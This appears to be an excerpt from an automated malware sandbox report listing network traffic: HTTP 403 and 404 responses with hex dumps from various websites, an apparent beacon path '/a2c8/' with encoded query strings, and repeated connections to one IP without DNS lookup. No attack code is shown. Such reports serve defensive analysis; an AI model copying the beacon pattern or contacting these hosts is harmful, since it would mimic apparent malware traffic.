      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Jun 2022 05:53:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 190X-Sorting-Hat-ShopId: 62128619711X-Dc: gcp-europe-west1X-Request-ID: ccb56c71-84fa-4c77-ac00-04576f4129a6X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 718fd8d98bac9bb6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Jun 2022 05:54:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jun 2022 05:54:53 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAccept-Ranges: noneVary: Accept-EncodingTransfer-Encoding: chunkedConnection: closeData Raw: 34 30 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 20 6c 61 6e 67 3d 27 69 64 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 23 34 32 34 61 35 36 27 20 6e 61 6d 65 3d 27 74 68 65 6d 65 2d 63 6f 6c 6f 72 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 23 34 32 34 61 35 36 27 20 6e 61 6d 65 3d 27 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 76 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 62 6c 6f 67 67 65 72 27 20 6e 61 6d 65 3d 27 67 65 6e 65 72 61 74 6f 72 27 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 65 6c 61 6a 61 72 61 6b 75 6e 74 61 6e 73 69 70 61 6a 61 6b 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 65 6c 61 6a 61 72 61 6b 75 6e 74 61 6e 73 69 70 61 6a 61 6b 2e 63 6f 6d 2f 2f 61 32 63 38 2f 3f 36 6c 62 4c 3d 71 54 66 54 7a 30 26 44 6a 66 3d 43 34 51 74 4c 31 32 33 55 71 72 46 59 30 5a 49 76 73 69 73 73 57 79 30 67 54 77 51 5a 76 61 76 75 47 64 41 4d 64 36 32 57 6e 65 4a 59 65 4c 65 7a 62 34 62 50 4c 65 4e 35 6d 71 54 4d 74 39 36 74 4a 2f 49 27 20 72 65 6c 3d 27 63 61 6e 6f 6e 69 63 61 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 42 65 6c 61 6a 61 72 20 41 6b 75 6e 74 61 6e 73 69 20 50 65 72 70 61 6a 61 6b 61 6e 20 2d 20 41 74 6f 6d 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 65 6c 61 6a 61 72 61 6b 75 6e 74 61 6e 73 69 70 61 6a 61 6b 2e 63 6f 6d 2f 66 65 65 64 73 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 42 65 6c 61 6a 61 72 20 41 6b 75 6e 74 61 6e 73 69 20 50 65 72 70 61 6a 61 6b 61 6e 20 2d 20 52 53 53 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jun 2022 05:56:15 GMTServer: Apache/2.4.10 (Debian)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6f 75 73 73 65 63 6c 6f 75 64 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.soussecloud.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.29content-type: text/html; charset=UTF-8transfer-encoding: chunkeddate: Fri, 10 Jun 2022 05:57:15 GMTserver: LiteSpeedData Raw: 32 33 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 0a 09 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e0 b9 84 e0 b8 a1 e0 b9 88 e0 b8 9e e0 b8 9a e0 b8 ab e0 b8 99 e0 b9 89 e0 b8 b2 20 26 23 38 32 31 31 3b 20 49 43 4d 2d 42 72 6f 6b 65 72 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 49 43 4d 2d 42 72 6f 6b 65 72 73 20 26 72 61 71 75 6f 3b 20 e0 b8 9f e0 b8 b5 e0 b8 94 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 63 6d 2d 62 72 6f 6b 65 72 73 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 49 43 4d 2d 42 72 6f 6b 65 72 73 20 26 72 61 71 75 6f 3b 20 e0 b8 9f e0 b8 b5 e0 b8 94 e0 b8 84 e0 b8 a7 e0 b8 b2 e0 b8 a1 e0 b9 80 e0 b8 ab e0 b9 87 e0 b8 99 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 63 6d 2d 62 72 6f 6b 65 72 73 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 31 2e 32 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 31 2e 32 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.15.11Date: Fri, 10 Jun 2022 05:57:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.3.4Data Raw: 38 33 32 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a c2 a0 c2 a0 c2 a0 c2 a0 67 6f 77 65 63 68 61 74 28 29 3b 0a c2 a0 c2 a0 c2 a0 c2 a0 66 75 6e 63 74 69 6f 6e 20 67 6f 77 65 63 68 61 74 28 29 20 7b 0a c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 76 61 72 20 75 61 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 76 61 72 20 69 73 57 65 69 78 69 6e 20 3d 20 75 61 2e 69 6e 64 65 78 4f 66 28 27 4d 69 63 72 6f 4d 65 73 73 65 6e 67 65 72 27 29 20 3e 20 2d 31 3b 0a c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 2f 2f 20 e6 98 af e5 be ae e4 bf a1 e6 b5 8f e8 a7 88 e5 99 a8 0a c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 69 66 20 28 69 73 57 65 69 78 69 6e 29 20 7b 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 77 78 2e 68 74 6d 6c 27 3b 20 2f 2f 20 e5 be ae e4 bf a1 e8 b7 b3 e8 bd ac 0a c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 7d 0a c2 a0 c2 a0 c2 a0 c2 a0 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 30 2e 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 32 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e8 a7 86 e9 a2 91 e7 bd 91 e7 9b 98 20 2d 20 e8 b6 85 e5 85 89 e9 80 9f 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 3e 3c 68 34 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e8 a7 86 e9 a2 91 e7 bd 91 e7 9b 98 20 2d 20 e8 b6 85 e5 85 89 e9 80 9f ef bc 9a 3c 2f 66 6f 6e 74 3e 3c 2f 68 34 3e 3c 2f 70 3e 0a 09 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 65 74 61 6c 69 67 68 74 73 70 65 65 64 2e 63 6f 6d 2f 22 3e 3c 68 34 3e 77 77 77 2e 6d 65 74 61 6c 69 67 68 74 73 70 65 65 64 2e 63 6f 6d 3c 2f 68 34 3e 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 3e 3c 68 34 3e e7 bd 91 e7 9b 98 e9 9c 80 e8 a6 81 e5 af 86 e7 a0 81 e6 89 93 e5 bc 80 3c 2f 68 34 3e 3c 2f 70 3e 0a 3c 2f 70 3e 3c 68 34 3e e4 b8 80 e5 88 86 e9 92 9f e5 81 9a e5 ae 8c e4 bb bb e5 8a a1 e8 8e b7 e5 be 97 e7 bd 91 e7 9b 98 e5 af 86 e7 a0 81 ef bc 8c e7 95 85 e7 9c 8b e8 a7 86 e9 a2 9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jun 2022 05:58:18 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 283Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 61 6e 61 62 72 6f 69 6d 70 65 78 70 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.ranabroimpexp.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Fri, 10 Jun 2022 05:56:21 GMTConnection: closeContent-Length: 1916Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Fri, 10 Jun 2022 05:59:18 GMTserver: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30content-length: 203content-type: text/html; charset=iso-8859-1connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 32 63 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a2c8/ was not found on this server.</p></body></html>
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
